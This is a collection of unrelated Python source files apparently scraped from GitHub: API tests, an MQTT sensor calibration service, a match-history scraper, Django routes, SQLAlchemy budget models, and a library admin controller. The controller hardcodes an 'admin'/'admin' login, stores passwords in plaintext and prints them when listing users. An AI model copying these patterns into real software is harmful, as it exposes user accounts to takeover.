self.assert_parameters(endpoint_should_be, endpoint_to_check)\n\n def test_create_new_device_server_endpoint(self):\n endpoint_should_be = self._base_endpoint\n\n endpoint_to_check, _ = self.test_class.create_new_device_server(\n self.random_uuid\n )\n\n self.assert_parameters(endpoint_should_be, endpoint_to_check)\n\n def test_create_new_device_server_payload(self):\n description = self.faker.name()\n permitted_ips = []\n for x in range(0, random.randint(1, 10)):\n permitted_ips.append(self.faker.ssn())\n\n payload_should_be = {\n \"description\": description,\n \"secret\": self.api_client.api_key,\n \"permitted_ips\": permitted_ips\n }\n\n _, payload_to_check = \\\n self.test_class.create_new_device_server(\n description, permitted_ips)\n\n self.assert_parameters(payload_should_be, payload_to_check)\n","repo_name":"PJUllrich/Complete-Bunq-API-Python-Wrapper","sub_path":"tests/endpoints/test_device_server.py","file_name":"test_device_server.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"}
+{"seq_id":"73585214161","text":"import json\nimport argparse\nimport pathlib\nimport datetime as dt\nfrom functools import partial\n\nimport paho.mqtt.client as mqtt\n\nfrom dataclasses import dataclass\n\nPREFIX = \"beehive\"\nROLAND_TOPIC = \"B-value\"\n\n# This suffix is appended to the system name to indicate\n# the values have been calibrated\nSUFFIX = \"calibrated\"\n\n\ndef IDENTITY(x):\n return x\n\n\n@dataclass\nclass SensorValues:\n temperature: float\n humidity: float\n\n @classmethod\n def from_raw(cls, temperature, humidity):\n return cls(\n temperature=raw2temperature(temperature),\n humidity=raw2humidity(humidity),\n )\n\n\ndef raw2humidity(humidity):\n return humidity * 100 / 65535.0\n\n\ndef raw2temperature(temperature):\n return temperature * 175.0 / 65535.0 - 45.0\n\n\ndef process_sensor_payload(sensor_payload):\n id_, temperature, humidity = sensor_payload.split(\",\")\n assert temperature[0] == \"T\"\n assert humidity[0] == \"H\"\n return id_, int(temperature[1:], 16), int(humidity[1:], 16)\n\n\ndef process_payload(payload):\n header, *sensors = payload.decode(\"ascii\").split(\";\")\n sequence, timestamp = header.split(\",\")\n timestamp = dt.datetime.fromisoformat(timestamp.split(\"+\")[0])\n sensors = {\n id_: SensorValues.from_raw(temperature, humidity)\n for id_, temperature, humidity in\n (process_sensor_payload(sensor) for sensor in sensors)\n }\n return sequence, timestamp, sensors\n\n\ndef produce_roland_message(name, cvs, sequence):\n res = []\n values = [\n f\"{id_},{values.temperature},{values.humidity}\"\n for id_, values in sorted(cvs.items())\n ]\n payload = \":\".join([f\"{name}-{SUFFIX},{sequence}\"] + values)\n res.append((ROLAND_TOPIC, payload))\n return res\n\n\ndef clamp16bit(value):\n return max(0, min(int(value), 65535))\n\n\ndef temperature2raw(temperature):\n # temperature * 175.0 / 65535.0 - 45.0\n return clamp16bit((temperature + 45) / 175.0 * 65535.0)\n\n\ndef humidity2raw(humidity):\n return clamp16bit(humidity / 100.0 * 65535.0)\n\n\ndef native_remapping(cvs):\n res = []\n for id_, values in sorted(cvs.items()):\n res.append(\n f\"{id_},\"\n f\"T{temperature2raw(values.temperature):04x},\"\n f\"H{humidity2raw(values.humidity):04x}\"\n )\n return res\n\n\ndef produce_calibrated_native_message(name, cvs, timestamp, sequence):\n topic = f\"{PREFIX}-{SUFFIX}/{name}\"\n payload = \";\".join(\n [f\"{sequence},{timestamp.isoformat()}\"] +\n native_remapping(cvs)\n )\n return topic, payload\n\n\ndef generate_calibrated_messages(name, payload, calibrations):\n sequence, timestamp, sensor_values = process_payload(payload)\n cvs = {}\n for id_, values in sensor_values.items():\n cvs[id_] = calibrations[id_](values)\n\n messages = produce_roland_message(name, cvs, sequence)\n messages.append(produce_calibrated_native_message(name, cvs, timestamp, sequence))\n\n return messages\n\n\ndef apply_calibration(calibration, v):\n return SensorValues(\n temperature=calibration[\"temperature\"][\"slope\"] * v.temperature +\n calibration[\"temperature\"][\"intercept\"],\n humidity=calibration[\"humidity\"][\"slope\"] * v.humidity +\n calibration[\"humidity\"][\"intercept\"]\n )\n\n\ndef load_calibrations(path):\n with path.open() as inf:\n data = json.load(inf)\n\n reference_id = data[\"reference_id\"]\n\n testo_calibration = IDENTITY\n if \"testo-calibration\" in data:\n testo_calibration = partial(\n apply_calibration,\n data[\"testo-calibration\"],\n )\n\n assert reference_id not in data[\"calibrations\"]\n\n calibrations = {\n reference_id: testo_calibration,\n }\n\n for id_, calibration in data[\"calibrations\"].items():\n inner_function = partial(\n apply_calibration,\n calibration,\n )\n calibrations[id_] = lambda values: testo_calibration(inner_function(values))\n\n return calibrations\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--mqtt-host\", default=\"localhost\")\n parser.add_argument(\"--mqtt-port\", type=int, default=1883)\n parser.add_argument(\"--mqtt-topic\", default=f\"{PREFIX}/#\")\n parser.add_argument(\"--calibration\", required=True, type=pathlib.Path)\n opts = parser.parse_args()\n\n calibrations = load_calibrations(opts.calibration)\n\n def on_connect(*_args):\n client.subscribe(opts.mqtt_topic)\n\n def on_message(client, userdata, msg):\n name = msg.topic[len(f\"{PREFIX}/\"):]\n for topic, payload in generate_calibrated_messages(\n name, msg.payload, calibrations\n ):\n print(topic, payload)\n client.publish(topic, payload)\n\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n\n client.connect(opts.mqtt_host, opts.mqtt_port, 60)\n client.loop_forever()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"deets/beehive-monitor","sub_path":"scripts/calibration-service.py","file_name":"calibration-service.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"11377729482","text":"import string\nimport logging\nimport os\nfrom datetime import date\n\nfrom itertools import product\nimport numpy as np\nimport pandas as pd\n\nlog = logging.getLogger(__file__)\nlog.setLevel(logging.DEBUG)\n\nlogdir = os.environ.get(\"MEASURE_LOG_DIRECTORY\", \".\")\nlogfile = f\"measures_{date.today().isoformat()}.log\"\nhand = logging.FileHandler(logfile)\nhand.setLevel(logging.DEBUG)\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\nhand.setFormatter(formatter)\n\n\ndef measure_single(image_reader, measure, columns, progress_bar=None, **kwargs):\n\n metadata = image_reader.get_metadata()\n size_z = metadata[\"SizeZ\"]\n size_c = metadata[\"SizeC\"]\n size_t = metadata[\"SizeT\"]\n data = pd.DataFrame(\n np.empty((size_z * size_c * size_t, len(columns))), columns=columns\n )\n labels = metadata.get(\"ChannelLabels\", string.ascii_uppercase[:size_c])\n for col in columns:\n if col in metadata:\n data[col] = metadata[col]\n\n if progress_bar is not None:\n progress_bar.max = size_z * size_c * size_t\n progress_bar.value = 0\n\n for i, ((c, z, t), plane) in enumerate(image_reader):\n if progress_bar is not None:\n progress_bar.description = f\"Frame {i}/{size_z * size_c * size_t}\"\n progress_bar.value = i + 1\n\n data.loc[i, [\"C\", \"Z\", \"T\"]] = c, z, t\n data.loc[i, \"ChannelLabel\"] = labels[c]\n m = measure(plane, metadata, **kwargs)\n for key in m:\n data.loc[i, key] = m[key]\n data[\"AquisitionDate\"] = pd.to_datetime(data[\"AquisitionDate\"])\n\n return data\n\n\ndef measure_process(lock, hf5_record, image_reader, measure, columns, **kwargs):\n module = measure.__module__.split(\".\")[-1]\n try:\n log.info(f\"treating image #{image_reader.id}\")\n data = measure_single(\n image_reader, measure, columns, progress_bar=None, **kwargs\n )\n except Exception as e:\n log.info(\n f\"Error {type(e)}: {e} in measuring image {image_reader.id}\"\n f\" with {measure.__name__} from {module}\"\n )\n raise e\n try:\n lock.acquire()\n with pd.HDFStore(hf5_record, \"a\") as file:\n file.append(key=module, value=data, data_columns=[\"AquisitionDate\"])\n finally:\n lock.release()\n return data\n","repo_name":"centuri-engineering/auto_metro","sub_path":"auto_metro/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"16178758255","text":"from ast import In\nfrom interface import InterfacePrints\nfrom livros_controller import LivrosController\nfrom aluguel_controller import AlugueisController\nfrom multa_controller import MultaController\n\nclass AdmController:\n def __init__(self, conn):\n self.conn = conn\n self.livros_controller = LivrosController(conn)\n self.alugueis_controller = AlugueisController(conn)\n self.multa_controller = MultaController(conn)\n\n def login(self):\n \n login = input(\"Login: \")\n senha = input(\"Senha: \")\n\n if login != 'admin' or senha != 'admin':\n InterfacePrints.print_invalid_login()\n return\n self.run()\n\n def run(self):\n\n InterfacePrints.print_adm_menu()\n try:\n escolha = int(input())\n except:\n InterfacePrints.print_invalid_option()\n self.run()\n return\n\n self.executar_escolha(escolha)\n\n def executar_escolha(self, escolha):\n\n # Livros\n if escolha == 1:\n self.administrar_livros()\n\n # Usuarios\n elif escolha == 2:\n self.administrar_usuarios()\n\n elif escolha == 3:\n self.listar_usuarios()\n \n elif escolha == 4:\n self.listar_livros()\n\n elif escolha == 5:\n id_aluguel = input(\"Id do aluguel: \")\n self.alugueis_controller.resolver_aluguel(id_aluguel)\n InterfacePrints.waiting_key_msg()\n\n elif escolha == 6:\n id_multa = input(\"Id da multa: \")\n self.multa_controller.resolver_multa(id_multa)\n InterfacePrints.waiting_key_msg()\n\n elif escolha == 0:\n InterfacePrints.print_exiting_msg()\n return\n else:\n InterfacePrints.print_invalid_option()\n self.run()\n \n self.run()\n\n def administrar_livros(self):\n InterfacePrints.print_add_remove_edit()\n auxEscolha = int(input())\n if auxEscolha == 1:\n nome = input(\"Nome: \")\n descricao = input(\"Descricao: \")\n self.livros_controller.criar_livro((nome, descricao))\n elif auxEscolha == 2:\n id_livro = input(\"Id do livro: \")\n self.livros_controller.excluir_livro(id_livro)\n elif auxEscolha == 3:\n id_livro = input(\"Id do livro: \")\n nome = input(\"Nome: \")\n descricao = input(\"Descricao: \")\n self.livros_controller.editar_livro((nome, descricao, id_livro))\n elif auxEscolha == 0:\n self.run()\n else:\n InterfacePrints.print_invalid_option()\n self.run()\n\n def administrar_usuarios(self):\n InterfacePrints.print_add_remove_edit()\n auxEscolha = int(input())\n if auxEscolha == 1:\n login = input(\"Login: \")\n senha = input(\"Senha: \")\n # input with 0 or 1\n permissao = input(\"Permissao: \")\n self.criar_usuario((login, senha, permissao), self.conn)\n elif auxEscolha == 2:\n id_usr = input(\"Id do usuario: \")\n self.excluir_usuario(id_usr, self.conn)\n elif auxEscolha == 3:\n id_usr = input(\"Id do usuario: \")\n login = input(\"Login: \")\n senha = input(\"Senha: \")\n permissao = input(\"Permissao: \")\n self.editar_usuario((login, senha, permissao ,id_usr), self.conn)\n elif auxEscolha == 0:\n self.run()\n else:\n InterfacePrints.print_invalid_option()\n self.run()\n\n\n def criar_usuario(self, usuario, conn):\n sql = ''' INSERT INTO usuarios(login,senha,permissoes)\n VALUES(?,?,?) '''\n cur = conn.cursor()\n cur.execute(sql, usuario)\n conn.commit()\n return cur.lastrowid\n\n def excluir_usuario(self, id_usuario, conn):\n sql = 'DELETE FROM usuarios WHERE id=?'\n cur = conn.cursor()\n cur.execute(sql, (id_usuario,))\n conn.commit()\n return 0\n\n def editar_usuario(self, usuario, conn):\n sql = ''' UPDATE usuarios\n SET login = ? ,\n senha = ? ,\n permissoes = ?\n WHERE id = ?'''\n cur = conn.cursor()\n cur.execute(sql, usuario)\n conn.commit()\n return 0\n\n def listar_usuarios(self):\n cur = self.conn.cursor()\n cur.execute(\"SELECT * FROM usuarios\")\n\n usuarios = cur.fetchall()\n InterfacePrints._clear()\n for usuario in usuarios:\n print('Id: ', usuario[0])\n print('Usuario: ', usuario[1])\n print('Senha: ', usuario[2])\n print('Permissao: ', usuario[3])\n print('=======================')\n InterfacePrints.waiting_key_msg()\n return usuarios\n\n def listar_livros(self):\n cur = self.conn.cursor()\n cur.execute(\"SELECT * FROM livros\")\n\n livros = cur.fetchall()\n InterfacePrints._clear()\n for livro in livros:\n print('Id: ', livro[0])\n print('Nome: ', livro[1])\n print('Descricao:: ', livro[2])\n print('=======================')\n \n InterfacePrints.waiting_key_msg()\n return livros\n\n def pesquisar_usuario_por_login(self, conn, login):\n sql = 'SELECT * FROM livros WHERE login=?'\n cur = conn.cursor()\n cur.execute(sql, [login])\n rows = cur.fetchall()\n return rows\n","repo_name":"HEITORPS123/engenharia_de_software_2_tp","sub_path":"adm_controller.py","file_name":"adm_controller.py","file_ext":"py","file_size_in_byte":5494,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"12781476466","text":"# -*- coding: utf-8 -*-\n# @Author: Administrator\n# @Date: 2019-05-14 03:38:39\n# @Last Modified by: Administrator\n# @Last Modified time: 2019-05-16 17:23:40\n\n__all__ = [\n\n \"task_download_global_matches\",\n \"task_download_previous_global_matches\",\n\n ]\n\nimport os\nimport time\nfrom lxml import etree\nfrom urllib.parse import urlparse, parse_qs\nfrom ...client.botzone import BotzoneClient\nfrom ...client.bean import GlobalMatchBean\nfrom ...client.utils import format_timestamp\nfrom ...utils import json_load, json_dump\nfrom ...log import ConsoleLogger\nfrom ..const import CONFIG_JSON_FILE, GLOBAL_MATCHES_DATA_DIR, REQUESTS_INTERVAL, REQUESTS_INTERVAL\nfrom ..utils import log_schedule_task\n\n\n_logger = ConsoleLogger(\"schedule.global_match\")\n_client = BotzoneClient()\n\n\n@log_schedule_task(_logger, \"fetch global matches\")\ndef task_download_global_matches():\n \"\"\"\n 下载第一页内与特定 bot 相关的全局的比赛记录\n \"\"\"\n config = json_load(CONFIG_JSON_FILE)\n gameID = config[\"global_match\"][\"game_id\"]\n botID = config[\"global_match\"][\"bot_id\"]\n\n r = _client.get_global_match_list(gameID)\n tree = etree.HTML(r.content)\n matches = [ GlobalMatchBean(tr)\n for tr in tree.xpath('//body/div[@class=\"container\"]//table//tr[position()>1]') ]\n\n counter = 0\n for match in matches:\n file = os.path.join(GLOBAL_MATCHES_DATA_DIR, \"%s.json\" % match.id)\n if os.path.exists(file):\n continue\n for player in match.players:\n if player.isBot and player.botID == botID:\n json_dump(match.dict, file, ensure_ascii=False, indent=4)\n counter += 1\n break\n\n _logger.info(\"botID: %s\" % botID)\n _logger.info(\"downloaded %d new global matches about this bot\" % counter)\n\n\n@log_schedule_task(_logger, \"fetch previous global matches\")\ndef task_download_previous_global_matches():\n \"\"\"\n 下载从本地记录所保存的最新的 matchID 至今的所有和特定 bot 相关的全局比赛记录\n 如果本地缓存为空,则不执行这个任务\n \"\"\"\n config = json_load(CONFIG_JSON_FILE)\n gameID = config[\"global_match\"][\"game_id\"]\n botID = config[\"global_match\"][\"bot_id\"]\n\n matchIDs = [ filename.rstrip(\".json\") for filename\n in os.listdir(GLOBAL_MATCHES_DATA_DIR) if filename.endswith(\".json\") ]\n\n if len(matchIDs) == 0:\n _logger.info(\"no local records, the latest matchID can't be determined\")\n return\n\n else:\n latestMatchID = max(matchIDs)\n latestMatchTime = None\n\n while True:\n\n _logger.info(\"latest matchID: %s\" % latestMatchID)\n if latestMatchTime is not None:\n _logger.info(\"latest match time: %s\" % format_timestamp(latestMatchTime) )\n\n r = _client.get_global_match_list(gameID, endID=latestMatchID) # 从后往前找\n\n if len(r.history) > 0: # 发生了 302 重定向,原因是无更新记录,这就到达了任务终点\n querys = parse_qs( urlparse(r.url).query )\n msg = querys.get(\"msg\")\n if msg is not None and msg[0] == \"nomore\":\n _logger.info(\"no more matches\")\n break\n else:\n _logger.warning(\"API has changed, msg == %s\" % msg)\n break\n\n tree = etree.HTML(r.content)\n matches = [ GlobalMatchBean(tr)\n for tr in tree.xpath('//body/div[@class=\"container\"]//table//tr[position()>1]') ]\n\n if len(matches) == 0: # 找到了终点\n break\n\n counter = 0\n for match in matches:\n file = os.path.join(GLOBAL_MATCHES_DATA_DIR, \"%s.json\" % match.id)\n if os.path.exists(file):\n continue\n for player in match.players:\n if player.isBot and player.botID == botID:\n json_dump(match.dict, file, ensure_ascii=False, indent=4)\n counter += 1\n break\n\n _logger.info(\"botID: %s\" % botID)\n _logger.info(\"downloaded %d previous new global matches about this bot\" % counter)\n\n latestMatchID = matches[0].id\n latestMatchTime = matches[0].time\n\n time.sleep(REQUESTS_INTERVAL)\n _logger.info(\"sleep %.2f s\" % REQUESTS_INTERVAL)\n","repo_name":"zhongxinghong/Botzone-Tank2","sub_path":"tools/_lib/scheduler/tasks/global_match.py","file_name":"global_match.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"}
+{"seq_id":"3718506001","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\",views.Home,name=\"Index\"),\n path(\"indicadores\",views.Indicadores,name=\"Indicadores\"),\n path(\"calculadora\",views.Calculadora,name=\"Calculadora\"),\n path(\"tabla\",views.Tabla,name=\"Tabla\"),\n path(\"descargar\",views.Descargar,name=\"Descargar\"),\n path(\"graficas\",views.Grafica,name=\"Grafica\")\n]\n","repo_name":"daniel-lara-ec/Proy-Actuarial2023A","sub_path":"sitio web/actuarial/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"32191636832","text":"\"\"\"CAN models.\"\"\"\nfrom enum import Enum\nfrom typing import Any, ClassVar, Optional\n\nimport sqlalchemy as sa\nfrom models.base import BaseModel\nfrom models.portfolios import Portfolio, shared_portfolio_cans\nfrom models.users import User\nfrom sqlalchemy import (\n Boolean,\n Column,\n Date,\n DateTime,\n ForeignKey,\n Identity,\n Integer,\n Numeric,\n String,\n Table,\n Text,\n case,\n select,\n)\nfrom sqlalchemy.dialects.postgresql import ENUM\nfrom sqlalchemy.orm import (\n InstrumentedAttribute,\n Mapped,\n column_property,\n mapped_column,\n object_session,\n relationship,\n with_polymorphic,\n)\nfrom typing_extensions import override\n\n\nclass BudgetLineItemStatus(Enum):\n DRAFT = 1\n UNDER_REVIEW = 2\n PLANNED = 3\n IN_EXECUTION = 4\n OBLIGATED = 5\n\n\nclass CANArrangementType(Enum):\n OPRE_APPROPRIATION = 1\n COST_SHARE = 2\n IAA = 3\n IDDA = 4\n MOU = 5\n\n\ncan_funding_sources = Table(\n \"can_funding_sources\",\n BaseModel.metadata,\n Column(\"can_id\", ForeignKey(\"can.id\"), primary_key=True),\n Column(\n \"funding_source_id\",\n ForeignKey(\"funding_source.id\"),\n primary_key=True,\n ),\n)\n\n\nclass FundingSource(BaseModel):\n \"\"\"The Funding Source (Source) for the CAN.\n\n From: https://docs.google.com/spreadsheets/d/18FP-ZDnvjtKakj0DDGL9lLXPry8xkqNt/\n\n > Instead of \"\"Source,\"\" consider \"\"Funding Source\"\"\n Instead of \"\"Agency,\"\" consider \"\"Funding Partner\"\"\n \"\"\"\n\n __tablename__ = \"funding_source\"\n id = Column(Integer, primary_key=True)\n name = Column(String(100), nullable=False)\n nickname = Column(String(100))\n cans = relationship(\n \"CAN\",\n secondary=can_funding_sources,\n back_populates=\"funding_sources\",\n )\n\n @BaseModel.display_name.getter\n def display_name(self):\n return self.name\n\n\nclass FundingPartner(BaseModel):\n \"\"\"The Funding Partner (Agency) for the CAN.\n\n See docstring for FundingSource\n \"\"\"\n\n __tablename__ = \"funding_partner\"\n id = Column(Integer, primary_key=True)\n name = Column(String(100), nullable=False)\n nickname = Column(String(100))\n\n @BaseModel.display_name.getter\n def display_name(self):\n return self.name\n\n\nclass AgreementType(Enum):\n CONTRACT = 1\n GRANT = 2\n DIRECT_ALLOCATION = 3\n IAA = 4\n IAA_AA = 5\n MISCELLANEOUS = 6\n\n\nclass AgreementReason(Enum):\n NEW_REQ = 1\n RECOMPETE = 2 ## recompete is brand new contract related to same work\n LOGICAL_FOLLOW_ON = (\n 3 ## Logical Follow On is more work added/extension of the original\n )\n\n\nagreement_team_members = Table(\n \"agreement_team_members\",\n BaseModel.metadata,\n Column(\"agreement_id\", ForeignKey(\"agreement.id\"), primary_key=True),\n Column(\"users_id\", ForeignKey(\"users.id\"), primary_key=True),\n)\n\n\nclass ProductServiceCode(BaseModel):\n \"\"\"Product Service Code\"\"\"\n\n __tablename__ = \"product_service_code\"\n\n id = Column(Integer, primary_key=True)\n name = Column(String, nullable=False)\n naics = Column(Integer, nullable=True)\n support_code = Column(String, nullable=True)\n description = Column(String)\n agreement = relationship(\"Agreement\")\n\n @BaseModel.display_name.getter\n def display_name(self):\n return self.name\n\n\nclass Agreement(BaseModel):\n \"\"\"Base Agreement Model\"\"\"\n\n __versioned__ = {}\n __tablename__ = \"agreement\"\n\n id: Mapped[int] = mapped_column(Identity(), primary_key=True)\n agreement_type = mapped_column(ENUM(AgreementType), nullable=False)\n name: Mapped[str] = mapped_column(\n String, nullable=False, comment=\"In MAPS this was PROJECT.PROJECT_TITLE\"\n )\n\n description: Mapped[str] = mapped_column(String, nullable=True)\n product_service_code_id: Mapped[int] = mapped_column(\n ForeignKey(\"product_service_code.id\"),\n nullable=True,\n )\n product_service_code: Mapped[Optional[ProductServiceCode]] = relationship(\n back_populates=\"agreement\"\n )\n agreement_reason = mapped_column(ENUM(AgreementReason))\n incumbent: Mapped[str] = mapped_column(String, nullable=True)\n project_officer_id: Mapped[int] = mapped_column(\n ForeignKey(\"users.id\"), nullable=True\n )\n project_officer: Mapped[Optional[User]] = relationship(\n User, foreign_keys=[project_officer_id]\n )\n team_members: Mapped[list[User]] = relationship(\n User,\n secondary=agreement_team_members,\n back_populates=\"agreements\",\n )\n research_project_id: Mapped[int] = mapped_column(\n ForeignKey(\"research_project.id\"), nullable=True\n )\n research_project: Mapped[Optional[\"ResearchProject\"]] = relationship(\n \"ResearchProject\", back_populates=\"agreements\"\n )\n budget_line_items: Mapped[list[\"BudgetLineItem\"]] = relationship(\n \"BudgetLineItem\",\n back_populates=\"agreement\",\n lazy=True,\n cascade=\"all, delete\",\n )\n procurement_shop_id: Mapped[int] = mapped_column(\n ForeignKey(\"procurement_shop.id\"), nullable=True\n )\n procurement_shop = relationship(\"ProcurementShop\", back_populates=\"agreements\")\n notes: Mapped[str] = mapped_column(Text, default=\"\")\n\n @BaseModel.display_name.getter\n def display_name(self):\n return self.name\n\n __mapper_args__: dict[str, str | AgreementType] = {\n \"polymorphic_identity\": \"agreement\",\n \"polymorphic_on\": \"agreement_type\",\n }\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n\n if isinstance(self.agreement_type, str):\n self.agreement_type = AgreementType[self.agreement_type]\n\n if isinstance(self.agreement_reason, str):\n self.agreement_reason = AgreementReason[self.agreement_reason]\n\n d.update(\n agreement_type=self.agreement_type.name if self.agreement_type else None,\n agreement_reason=self.agreement_reason.name\n if self.agreement_reason\n else None,\n budget_line_items=[bli.to_dict() for bli in self.budget_line_items],\n team_members=[tm.to_dict() for tm in self.team_members],\n research_project=self.research_project.to_dict()\n if self.research_project\n else None,\n procurement_shop=self.procurement_shop.to_dict()\n if self.procurement_shop\n else None,\n product_service_code=self.product_service_code.to_dict()\n if self.product_service_code\n else None,\n )\n\n return d\n\n\ncontract_support_contacts = Table(\n \"contract_support_contacts\",\n BaseModel.metadata,\n Column(\n \"contract_id\",\n ForeignKey(\"contract_agreement.id\"),\n primary_key=True,\n ),\n Column(\"users_id\", ForeignKey(\"users.id\"), primary_key=True),\n)\n\n\nclass ContractType(Enum):\n RESEARCH = 0\n SERVICE = 1\n\n\nclass ContractAgreement(Agreement):\n \"\"\"Contract Agreement Model\"\"\"\n\n __versioned__ = {}\n __tablename__ = \"contract_agreement\"\n\n id: Mapped[int] = mapped_column(ForeignKey(\"agreement.id\"), primary_key=True)\n contract_number: Mapped[str] = mapped_column(String, nullable=True)\n vendor: Mapped[str] = mapped_column(String, nullable=True)\n delivered_status: Mapped[bool] = mapped_column(Boolean, default=False)\n contract_type = mapped_column(ENUM(ContractType))\n support_contacts: Mapped[list[User]] = relationship(\n User,\n secondary=contract_support_contacts,\n back_populates=\"contracts\",\n )\n\n __mapper_args__ = {\n \"polymorphic_identity\": AgreementType.CONTRACT,\n }\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n\n if isinstance(self.contract_type, str):\n self.contract_type = ContractType[self.contract_type]\n\n d.update(\n {\n \"contract_type\": self.contract_type.name\n if self.contract_type\n else None,\n \"support_contacts\": [\n contacts.to_dict() for contacts in self.support_contacts\n ],\n }\n )\n\n return d\n\n\n# TODO: Skeleton, will need flushed out more when we know what all a Grant is.\nclass GrantAgreement(Agreement):\n \"\"\"Grant Agreement Model\"\"\"\n\n __versioned__ = {}\n __tablename__ = \"grant_agreement\"\n\n id: Mapped[int] = mapped_column(ForeignKey(\"agreement.id\"), primary_key=True)\n foa: Mapped[str]\n\n __mapper_args__ = {\n \"polymorphic_identity\": AgreementType.GRANT,\n }\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n return d\n\n\n# TODO: Skeleton, will need flushed out more when we know what all an IAA is.\n### Inter-Agency-Agreement\nclass IaaAgreement(Agreement):\n \"\"\"IAA Agreement Model\"\"\"\n\n __versioned__ = {}\n __tablename__ = \"iaa_agreement\"\n\n id: Mapped[int] = mapped_column(ForeignKey(\"agreement.id\"), primary_key=True)\n iaa: Mapped[str]\n\n __mapper_args__ = {\n \"polymorphic_identity\": AgreementType.IAA,\n }\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n return d\n\n\n# TODO: Skeleton, will need flushed out more when we know what all an IAA-AA is. Inter-Agency-Agreement-Assisted-Aquisition\n### Inter-Agency-Agreement-Assisted-Aquisition\nclass IaaAaAgreement(Agreement):\n \"\"\"IAA-AA Agreement Model\"\"\"\n\n __versioned__ = {}\n __tablename__ = \"iaa_aa_agreement\"\n\n id: Mapped[int] = mapped_column(ForeignKey(\"agreement.id\"), primary_key=True)\n iaa_aa: Mapped[str]\n\n __mapper_args__ = {\n \"polymorphic_identity\": AgreementType.MISCELLANEOUS,\n }\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n return d\n\n\nclass DirectAgreement(Agreement):\n \"\"\"Direct Obligation Agreement Model\"\"\"\n\n __versioned__ = {}\n __tablename__ = \"direct_agreement\"\n\n id: Mapped[int] = mapped_column(ForeignKey(\"agreement.id\"), primary_key=True)\n payee: Mapped[str] = mapped_column(String, nullable=False)\n\n __mapper_args__ = {\n \"polymorphic_identity\": AgreementType.DIRECT_ALLOCATION,\n }\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n return d\n\n\nclass CANFiscalYear(BaseModel):\n \"\"\"Contains the relevant financial info by fiscal year for a given CAN.\"\"\"\n\n __tablename__ = \"can_fiscal_year\"\n can_id = Column(Integer, ForeignKey(\"can.id\"), primary_key=True)\n fiscal_year = Column(Integer, primary_key=True)\n can = relationship(\"CAN\", lazy=\"joined\")\n total_fiscal_year_funding = Column(Numeric(12, 2))\n received_funding = Column(Numeric(12, 2))\n expected_funding = Column(Numeric(12, 2))\n potential_additional_funding = Column(Numeric(12, 2))\n can_lead = Column(String)\n notes = Column(String, default=\"\")\n total_funding = column_property(received_funding + expected_funding)\n\n @BaseModel.display_name.getter\n def display_name(self):\n if self.can:\n return f\"{self.can.display_name}:{self.fiscal_year}\"\n return f\"CAN#{self.can_id}:{self.fiscal_year}\"\n\n @override\n def to_dict(self):\n d = super().to_dict()\n\n d.update(\n total_fiscal_year_funding=float(self.total_fiscal_year_funding)\n if self.total_fiscal_year_funding\n else None,\n received_funding=float(self.received_funding)\n if self.received_funding\n else None,\n expected_funding=float(self.expected_funding)\n if self.expected_funding\n else None,\n potential_additional_funding=float(self.potential_additional_funding)\n if self.potential_additional_funding\n else None,\n total_funding=float(self.total_funding) if self.total_funding else None,\n )\n\n return d\n\n\nclass CANFiscalYearCarryForward(BaseModel):\n \"\"\"Contains the relevant financial info by fiscal year for a given CAN carried over from a previous fiscal year.\"\"\"\n\n __tablename__ = \"can_fiscal_year_carry_forward\"\n id = Column(Integer, primary_key=True)\n can_id = Column(Integer, ForeignKey(\"can.id\"))\n can = relationship(\"CAN\", lazy=\"joined\")\n from_fiscal_year = Column(Integer)\n to_fiscal_year = Column(Integer)\n received_amount = Column(Numeric(12, 2), default=0, nullable=False)\n expected_amount = Column(Numeric(12, 2), default=0, nullable=False)\n notes = Column(String, default=\"\")\n total_amount = column_property(received_amount + expected_amount)\n\n @override\n def to_dict(self):\n d = super().to_dict()\n\n d.update(\n received_amount=float(self.received_amount)\n if self.received_amount\n else None,\n expected_amount=float(self.expected_amount)\n if self.expected_amount\n else None,\n total_amount=float(self.total_amount) if self.total_amount else None,\n )\n\n return d\n\n\nclass BudgetLineItem(BaseModel):\n __versioned__ = {}\n __tablename__ = \"budget_line_item\"\n\n id = Column(Integer, Identity(), primary_key=True)\n line_description = Column(String)\n comments = Column(Text)\n\n agreement_id = Column(Integer, ForeignKey(\"agreement.id\"))\n agreement = relationship(Agreement, back_populates=\"budget_line_items\")\n\n can_id = Column(Integer, ForeignKey(\"can.id\"))\n can = relationship(\"CAN\", back_populates=\"budget_line_items\")\n\n amount = Column(Numeric(12, 2))\n\n status = Column(sa.Enum(BudgetLineItemStatus))\n\n date_needed = Column(Date)\n proc_shop_fee_percentage = Column(\n Numeric(12, 5)\n ) # may need to be a different object, i.e. flat rate or percentage\n\n @BaseModel.display_name.getter\n def display_name(self):\n return self.line_description if self.line_description else super().display_name\n\n @property\n def portfolio_id(self):\n return object_session(self).scalar(\n select(Portfolio.id)\n .join(CAN, Portfolio.id == CAN.managing_portfolio_id)\n .join(self.__class__, self.can_id 